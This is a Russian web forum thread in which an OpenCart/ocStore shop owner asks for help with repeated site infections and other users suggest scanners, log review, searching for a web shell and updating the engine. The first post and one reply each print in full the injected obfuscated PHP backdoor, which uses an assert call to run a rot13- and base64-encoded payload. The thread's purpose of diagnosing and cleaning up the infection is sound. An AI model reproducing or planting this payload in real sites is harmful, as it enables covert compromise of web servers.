В мгазин Opencart внедряют вредоносный код

В мгазин Opencart внедряют вредоносный код, Как защититься от взлома?

Опции

maxmer

Topic Starter сообщение

17.6.2015, 19:28; Ответить: maxmer

Сообщение #1

Завсегдатай

Группа: Active User
Сообщений: 640
Регистрация: 1.10.2011
Поблагодарили: 138 раз
Репутация:

33

Всем доброго времени суток.
Столкнулся со следующей проблемой: ломают один магазинчик на Opencart и меняют следующие файлы:

сайт.ру/index.php
сайт.ру/catalog/controller/common/maintenance.php
сайт.ру/catalog/controller/common/footer.php
сайт.ру/catalog/language/russian/common/footer.php
сайт.ру/admin/controller/common/footer.php
сайт.ру/admin/language/russian/common/footer.php

Добавляют в них этот код:

Код

//###=i=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIo
VzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJ
lWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ
50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5
xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9h
K2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aM
KDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1
EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvE
wZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGDl
AGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIE
IAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbWT
ZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWTZ
kXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTyv
qvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWfM
J5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv
51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4
xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ4
ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASH
yMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWT
yvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJZ
4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));'));
//###=i=###

Удалил эту гадость, поменял везде пароли. Через некоторое время все равно внедряют этот код.

Подскажите, пожалуйста, это какая-то уязвимость в движке Opencart или проблема на моей стороне? И как можно защититься от этих взломов?
Буду очень признателен за советы.

Магазин работает на ocStore 1.5.4.1

--------------------

- Недорогие ссылки с форумов
- Зарабатываю в РСЯ через https://app.adprofit.world/login/registration?u=219

0

Ответить с цитированием данного сообщения

web2033 web2033 17.6.2015, 21:13; Сообщений: 1 Поблагодарили: 1 раз Репутация: 0 Просмотр профиля	17.6.2015, 21:13; Ответить: web2033 Сообщение #2
Новичок Группа: Viewer Сообщений: 1 Регистрация: 18.5.2015 Поблагодарили: 1 раз Репутация: 0	Попробуйте этот сервис: AI-Bolit — это бесплатный сканер вирусов, хакерских шеллов, бэкдоров, спам-рассыльщиков и других вредоносных скриптов на хостинге. Поблагодарили: (1) maxmer

maxmer Topic Starter maxmerTopic Starter 18.6.2015, 18:00; Сообщений: 640 Поблагодарили: 138 раз Репутация: 33 Просмотр профиля	Topic Starter 18.6.2015, 18:00; Ответить: maxmer Сообщение #3
Завсегдатай Группа: Active User Сообщений: 640 Регистрация: 1.10.2011 Поблагодарили: 138 раз Репутация: 33	AI-Bolit к сожалению ничего не находит. Всякие онлайн-проверки на вирусы тоже молчат. Но как-то же заливают гадость? -------------------- - Недорогие ссылки с форумов - Зарабатываю в РСЯ через https://app.adprofit.world/login/registration?u=219

Maksimus Maksimus 18.6.2015, 18:17; Сообщений: 90 Поблагодарили: 17 раз Репутация: 6 Просмотр профиля	18.6.2015, 18:17; Ответить: Maksimus Сообщение #4
Частый гость Группа: User Сообщений: 90 Регистрация: 22.8.2013 Поблагодарили: 17 раз Репутация: 6	Добрый день! У меня была такая же проблема на этой платформе,попробуйте воспользоваться этим скриптом от яндекса http://yandex.ru/promo/manul#howtouse Сообщение отредактировал Maksimus - 18.6.2015, 18:18 Поблагодарили: (1) maxmer

maxmer Topic Starter maxmerTopic Starter 19.6.2015, 11:11; Сообщений: 640 Поблагодарили: 138 раз Репутация: 33 Просмотр профиля	Topic Starter 19.6.2015, 11:11; Ответить: maxmer Сообщение #5
Завсегдатай Группа: Active User Сообщений: 640 Регистрация: 1.10.2011 Поблагодарили: 138 раз Репутация: 33	Maksimus, спасибо. Пробовал тоже этот скрипт. К сожалению ничего не нашел. Может есть какая-нибудь уязвимость в этой версии Opencart? -------------------- - Недорогие ссылки с форумов - Зарабатываю в РСЯ через https://app.adprofit.world/login/registration?u=219

Sev_free Sev_free 21.6.2015, 11:31; Сообщений: 97 Поблагодарили: 18 раз Репутация: 2 Просмотр профиля	21.6.2015, 11:31; Ответить: Sev_free Сообщение #6
Частый гость Группа: User Сообщений: 97 Регистрация: 19.6.2015 Из: Севастополь Поблагодарили: 18 раз Репутация: 2	maxmer, пришли в личку ссылку на сайт, погляжу. Скорее всего тебе шелл залили, либо нашли где не фильтруется запрос в бд. -------------------- Большой спектр услуг от Sev_Free, Всегда рад помочь! Контакты: Skype:Sev_Free

Feax Feax 26.6.2015, 9:58; Сообщений: 3 Поблагодарили: 0 раз Репутация: 1 Просмотр профиля	26.6.2015, 9:58; Ответить: Feax Сообщение #7
Новичок Группа: Viewer Сообщений: 3 Регистрация: 9.2.2011 Поблагодарили: 0 раз Репутация: 1	Антивирусом вычищать вирусы - это борьба со следствием, чтобы избавиться от причины, нужно либо обновляться на самую свежую версию движка, либо смотреть логи доступа к сайту, искать в них способ взлома и закрывать дыру.

lawebo lawebo 26.6.2015, 22:54; Сообщений: 1 Поблагодарили: 0 раз Репутация: 0 Просмотр профиля	26.6.2015, 22:54; Ответить: lawebo Сообщение #8
Новичок Группа: Viewer Сообщений: 1 Регистрация: 21.6.2015 Поблагодарили: 0 раз Репутация: 0	скорей всего шелл, можно пройтись вручную по файлам поискать недавно измененые или которых явно не должно быть... было похожее на опенкарте в футер код вставляли, нашел левый файлик в image/cache/

Sev_free Sev_free 26.6.2015, 23:47; Сообщений: 97 Поблагодарили: 18 раз Репутация: 2 Просмотр профиля	26.6.2015, 23:47; Ответить: Sev_free Сообщение #9
Частый гость Группа: User Сообщений: 97 Регистрация: 19.6.2015 Из: Севастополь Поблагодарили: 18 раз Репутация: 2	Оберни с заменой : Код if (isset($ibv){ break; КОД }; КОД замени на : Код //###=i=### error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIo VzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAs J lWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250M J 50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ 5 xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9 h K2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9a M KDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH 1 EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYv E wZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGD l AGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISI E IAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbW T ZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWT Z kXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTy v qvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWf M J5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9V v 51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv 4 xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ 4 ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1AS H yMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tW T yvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJ Z 4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));')); //###=i=### И не парься) А так поднимай логи ищи шелл) П.С. А так помочь можно только при наличии ссылки на сайт и к бекапу файлов. Сообщение отредактировал Sev_free - 26.6.2015, 23:53 -------------------- Большой спектр услуг от Sev_Free, Всегда рад помочь! Контакты: Skype:Sev_Free Поблагодарили: (1) maxmer

SeBun SeBun 26.9.2015, 13:44; Сообщений: 15 Поблагодарили: 3 раза Репутация: 0 Просмотр профиля	26.9.2015, 13:44; Ответить: SeBun Сообщение #10
Новичок Группа: User Сообщений: 15 Регистрация: 23.12.2008 Поблагодарили: 3 раза Репутация: 0	maxmer, у вас случайно сайт не на timeweb? От движка этот взлом не зависит, заражаются все index.php на всех сайтах аккаунта. Хостер свою вину не признает. Вот тема. Пока разбираюсь. Восстановил все сайты из бекапа, пока полет нормальный. Анализирую зараженные в поисках шелла.

« Предыдущая тема · Программная часть · Следующая тема »

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Разработка сайтов Joomla Wordpress Opencart Разработка, верстка, оптимизация веб сайтов.	77	WoWeb	40422	3.9.2023, 16:52 автор: Sawich
Техподдержка сайтов на движках Joomla, Netcat, Opencart	5	54web	4288	22.1.2023, 13:27 автор: kikimora17
Создание интернет-магазинов на CMS OpenCart 3.* Готовое решение, современный дизайн, быстрый запуск!	0	M-seo	2523	27.6.2022, 2:01 автор: M-seo
Специалист OpenCart 1.5 / 2.x / 3.x Большой опыт разработки магазинов / сайтов услуг / доработка	1	nash	6057	24.11.2021, 16:53 автор: No_signal
Перенос (обновление) OpenCart и OcStore на новую версию 2х - 3х Перенесу ваш магазин на новую версию движка	3	Илья1981	8442	4.10.2021, 11:59 автор: Evgen_ppm